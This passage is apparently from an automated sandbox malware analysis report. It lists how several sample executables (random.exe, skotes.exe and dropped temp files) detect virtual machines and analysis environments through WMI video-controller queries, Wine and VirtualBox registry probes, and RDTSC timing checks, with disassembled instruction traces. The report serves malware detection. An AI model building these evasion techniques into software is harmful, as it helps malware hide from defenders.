Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\random.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\random.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: E1F165 second address: E1E9F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+122D2C8Dh], esi 0x00000010 push dword ptr [ebp+122D0155h] 0x00000016 mov dword ptr [ebp+122D22E7h], ecx 0x0000001c mov dword ptr [ebp+122D2230h], eax 0x00000022 call dword ptr [ebp+122D1A95h] 0x00000028 pushad 0x00000029 or dword ptr [ebp+122D2230h], ecx 0x0000002f xor eax, eax 0x00000031 jmp 00007F8D38B7BC92h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a cld 0x0000003b mov dword ptr [ebp+122D2B95h], eax 0x00000041 add dword ptr [ebp+122D2230h], esi 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007F8D38B7BC96h 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 mov dword ptr [ebp+122D2230h], eax 0x0000005b lodsw 0x0000005d xor dword ptr [ebp+122D3878h], ecx 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 mov dword ptr [ebp+122D3878h], eax 0x0000006d cmc 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 pushad 0x00000073 jnp 00007F8D38B7BC87h 0x00000079 popad 0x0000007a nop 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e push ecx 0x0000007f pop ecx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: E1E9F7 second address: E1EA12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8D38E56383h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: E1EA12 second address: E1EA27 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8D38B7BC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F8D38B7BC8Eh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9068B second address: F90691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F90691 second address: F9069C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8D38B7BC86h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9069C second address: F906A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F98E1D second address: F98E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F8D38B7BC90h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F98F9F second address: F98FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F98FA3 second address: F98FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F98FA7 second address: F98FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F8D38E56385h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F98FC9 second address: F98FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F8D38B7BC88h 0x0000000b pushad 0x0000000c jmp 00007F8D38B7BC92h 0x00000011 pushad 0x00000012 popad 0x00000013 js 00007F8D38B7BC86h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F992C8 second address: F992E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E5637Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007F8D38E56376h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F992E4 second address: F992EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9ABD7 second address: F9ABDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9ABDD second address: F9AC31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edx, dword ptr [ebp+122D1A0Ch] 0x0000000f push 00000000h 0x00000011 movsx edi, cx 0x00000014 mov ecx, dword ptr [ebp+122D17B3h] 0x0000001a call 00007F8D38B7BC89h 0x0000001f push esi 0x00000020 jmp 00007F8D38B7BC94h 0x00000025 pop esi 0x00000026 push eax 0x00000027 push ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F8D38B7BC97h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9AC31 second address: F9AC7D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c jmp 00007F8D38E56380h 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F8D38E56380h 0x0000001c jmp 00007F8D38E56389h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9AC7D second address: F9ACE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F8D38B7BC91h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push esi 0x00000012 pushad 0x00000013 jng 00007F8D38B7BC86h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c pop esi 0x0000001d pop eax 0x0000001e or esi, 0B9A2A66h 0x00000024 push 00000003h 0x00000026 jmp 00007F8D38B7BC92h 0x0000002b push 00000000h 0x0000002d pushad 0x0000002e cld 0x0000002f mov ebx, dword ptr [ebp+122D223Fh] 0x00000035 popad 0x00000036 push 00000003h 0x00000038 jnl 00007F8D38B7BC8Ah 0x0000003e push B3C21522h 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 push edi 0x00000047 pop edi 0x00000048 push edi 0x00000049 pop edi 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9AD87 second address: F9AD8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9AD8B second address: F9AD8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9AD8F second address: F9ADF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+122D22E2h], ecx 0x00000010 push 00000000h 0x00000012 mov di, 326Fh 0x00000016 push 72DD172Fh 0x0000001b jc 00007F8D38E5637Eh 0x00000021 jnp 00007F8D38E56378h 0x00000027 xor dword ptr [esp], 72DD17AFh 0x0000002e or dl, 00000026h 0x00000031 push 00000003h 0x00000033 jmp 00007F8D38E5637Eh 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D2C8Dh], edi 0x00000040 and di, FB64h 0x00000045 push 00000003h 0x00000047 and dx, 0888h 0x0000004c push 698D0C72h 0x00000051 push eax 0x00000052 push edx 0x00000053 jns 00007F8D38E5637Ch 0x00000059 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9AED4 second address: F9AEEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9AFDE second address: F9AFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9AFE4 second address: F9AFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FB96BD second address: FB96E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F8D38E56378h 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F8D38E56387h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FB9858 second address: FB9862 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8D38B7BC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FB9862 second address: FB9872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8D38E5637Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FB9872 second address: FB9886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F8D38B7BC9Ah 0x0000000f push ecx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FB9886 second address: FB988E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FB9DFE second address: FB9E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FB9E02 second address: FB9E1A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8D38E56376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8D38E5637Bh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FB9E1A second address: FB9E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBA3F2 second address: FBA424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38E56385h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F8D38E5637Eh 0x00000011 jnl 00007F8D38E56376h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBA424 second address: FBA440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38B7BC97h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBA6F8 second address: FBA6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBA6FE second address: FBA727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8D38B7BC86h 0x0000000a popad 0x0000000b jmp 00007F8D38B7BC96h 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F8D38B7BC86h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FB1204 second address: FB1210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jg 00007F8D38E56376h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBAA10 second address: FBAA33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F8D38B7BC86h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBAA33 second address: FBAA66 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8D38E56376h 0x00000008 jmp 00007F8D38E56386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8D38E56380h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBB019 second address: FBB01F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBB2D8 second address: FBB2EF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8D38E56376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F8D38E56378h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBF1E9 second address: FBF1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBF749 second address: FBF74D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBF74D second address: FBF753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBF753 second address: FBF762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38E5637Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBF762 second address: FBF783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d js 00007F8D38B7BCA6h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBF783 second address: FBF7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8D38E56388h 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8D38E56381h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBF7B9 second address: FBF7BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBF7BD second address: FBF7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBF7C3 second address: FBF7C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBF9D1 second address: FBF9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBF9D5 second address: FBF9EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FBF9EA second address: FBF9EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC0BC9 second address: FC0BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8D38B7BC97h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC722A second address: FC7249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jg 00007F8D38E56376h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jno 00007F8D38E56376h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC7249 second address: FC724D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC724D second address: FC7255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC825A second address: FC825F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC85B2 second address: FC85BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC8757 second address: FC8761 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8D38B7BC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC8761 second address: FC877E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D38E56389h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC877E second address: FC8795 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F8D38B7BC8Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC8795 second address: FC879F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8D38E56376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC8881 second address: FC8889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC8EB0 second address: FC8F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F8D38E56382h 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F8D38E5637Bh 0x00000013 xchg eax, ebx 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F8D38E56378h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2CA5h] 0x00000034 push eax 0x00000035 push ebx 0x00000036 push ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC9044 second address: FC9048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC9102 second address: FC9106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC9106 second address: FC911A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D38B7BC90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
